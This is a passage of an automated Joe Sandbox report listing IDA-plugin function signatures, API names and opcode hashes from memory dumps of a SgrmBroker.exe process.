                                                                                      • Instruction ID: d78b3f15a8eca5d538ee8be8940c202f29c0575af5bf406d52337a1920acc978
                                                                                      • Opcode Fuzzy Hash: 24ec87278d5b50c55761d5e5a74ac69a402749e9621c205fbc0bc0ec95ba6e9c
                                                                                      • Instruction Fuzzy Hash: 47315236618F8186DB60CF25E8802BE73A4FB89754F540636EA9D83B99DF3CD565CB00
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 1347740429-0
                                                                                      • Opcode ID: 73192da0503f5c78fd08333144c87677a945f3e8c40e8de4ea1893f38325c44d
                                                                                      • Instruction ID: 3f102b20f07d433733eb1b513f5e0f8f2f2276227df4c69620790eb23ecffd0e
                                                                                      • Opcode Fuzzy Hash: 73192da0503f5c78fd08333144c87677a945f3e8c40e8de4ea1893f38325c44d
                                                                                      • Instruction Fuzzy Hash: 4DB01200F16403C2E6483F360C8613D01702F44B40FA04432C518C0160CD2C917B4620
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 284f0467a77bc4f605e16177d8e9475f95c948627949936a1b9038c7357cbbf8
                                                                                      • Instruction ID: 878420bef214208796cde232563448f588e2d31005a8f805dc41444401ec5879
                                                                                      • Opcode Fuzzy Hash: 284f0467a77bc4f605e16177d8e9475f95c948627949936a1b9038c7357cbbf8
                                                                                      • Instruction Fuzzy Hash: 7E716766A05A8182E7559F16E4483BD67B2FF89BE4F444633CB6E866D0DF3CE4A5C300
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: MZx
                                                                                      • API String ID: 190572456-2575928145
                                                                                      • Opcode ID: e0ce3126c0ec86e077d6d75675942394944caefd053394c789b2ce584d65811c
                                                                                      • Instruction ID: fabc9c9d338435e4347278b88e791059a515ba0ef5bf88951a06429d487d01b1
                                                                                      • Opcode Fuzzy Hash: e0ce3126c0ec86e077d6d75675942394944caefd053394c789b2ce584d65811c
                                                                                      • Instruction Fuzzy Hash: 1A41D262B1AF42C2FA569F869C0457D6791BF84BE0F1D4636DE1DCB784EE3CE4648A00
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileFreeHeapModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 2130810879-0
                                                                                      • Opcode ID: 329e5465cf36dad3e40d6bc9a0745c305f6f761a589be0d330fb658b25984a61
                                                                                      • Instruction ID: 3e0813d54039822d1399bda32da9e91a6581aa21366a697d219677ed002b98f5
                                                                                      • Opcode Fuzzy Hash: 329e5465cf36dad3e40d6bc9a0745c305f6f761a589be0d330fb658b25984a61
                                                                                      • Instruction Fuzzy Hash: 7D41E562A08E4141FB606E7AE44833E66B0BB497E8F500332EE5DE77C1DE7CD561C600
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyErrorLast$LengthValid
                                                                                      • String ID:
                                                                                      • API String ID: 2568129594-0
                                                                                      • Opcode ID: e5d1a205fec4471ae0c871e2daceb5122ab26e8edb20701cfc6c749461f361bf
                                                                                      • Instruction ID: c2aa45bd5acf3ec7816b9f2d5ce843e709268840c1c2a20c74b4256103bf32f8
                                                                                      • Opcode Fuzzy Hash: e5d1a205fec4471ae0c871e2daceb5122ab26e8edb20701cfc6c749461f361bf
                                                                                      • Instruction Fuzzy Hash: 58116361B09E4341FB956F17A9803BE66956F49FD0F04C13ADE8DDA791EE3CA4A29300
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 3ac6476be0c3b383947b5493cbede7b9f28472ce701b9c380af2de8f0d378277
                                                                                      • Instruction ID: 67a9c8ad4e7c327cf23f8a7d5f60909e606afc4e48e634deb778d9789df94439
                                                                                      • Opcode Fuzzy Hash: 3ac6476be0c3b383947b5493cbede7b9f28472ce701b9c380af2de8f0d378277
                                                                                      • Instruction Fuzzy Hash: F531F066904E4182F368AF26E8843BD67A2FF89B54F445533DA4E976A0CF3CE4E5D300
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: main
                                                                                      • API String ID: 3298025750-3207122276
                                                                                      • Opcode ID: 0940b839725ae36b5a1ad9fbce4c34a275031e632e3d9234af1e099074fd8663
                                                                                      • Instruction ID: cab9ee87cf6012626375fdf0eade33e240fb2e740caf3b5e2e1dda8cd7c7e30a
                                                                                      • Opcode Fuzzy Hash: 0940b839725ae36b5a1ad9fbce4c34a275031e632e3d9234af1e099074fd8663
                                                                                      • Instruction Fuzzy Hash: 8A813036A08E8181EA608F16E58437DA3B1EF89B98F544237DA9DC77A4DF3CE465C700
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$AddressSingleWake
                                                                                      • String ID:
                                                                                      • API String ID: 2995119335-0
                                                                                      • Opcode ID: 421e2ceb116bf0c9edc8edd637012c73a9e06c37a358bdcd2894536ef235a773
                                                                                      • Instruction ID: dc679c46131d283555c39764f5f2182b635d37fd3b66e5308521e46731cbe676
                                                                                      • Opcode Fuzzy Hash: 421e2ceb116bf0c9edc8edd637012c73a9e06c37a358bdcd2894536ef235a773
                                                                                      • Instruction Fuzzy Hash: AA617D22A08E4146EA509F16D98437D67B1FF88B98F494633DE4DC77A1CE3DE4A28381
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1956605914-0
                                                                                      • Opcode ID: 6727169349466a80a5377bb4e83f99f5f7794e299e60947d92bd081cc1b73e53
                                                                                      • Instruction ID: 624ad2ba1ed766eed199514d078695da96e9307d1e2ffcd53945899dd6f82df4
                                                                                      • Opcode Fuzzy Hash: 6727169349466a80a5377bb4e83f99f5f7794e299e60947d92bd081cc1b73e53
                                                                                      • Instruction Fuzzy Hash: CF41E162E0C96246F7644E91A40837E66F1EF54B88F444233EE8EC7BD5DE7CE9A18740
APIs
• HeapFree.KERNEL32(?,00000003,?,?,?,00000000,00007FF6D9CF4991,?,?,?), ref: 00007FF6D9CF5CAC
Memory Dump Source
• Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
• Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Similarity
• API ID: FreeHeap$AddressSingleWake
• String ID:
• API String ID: 2995119335-0
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0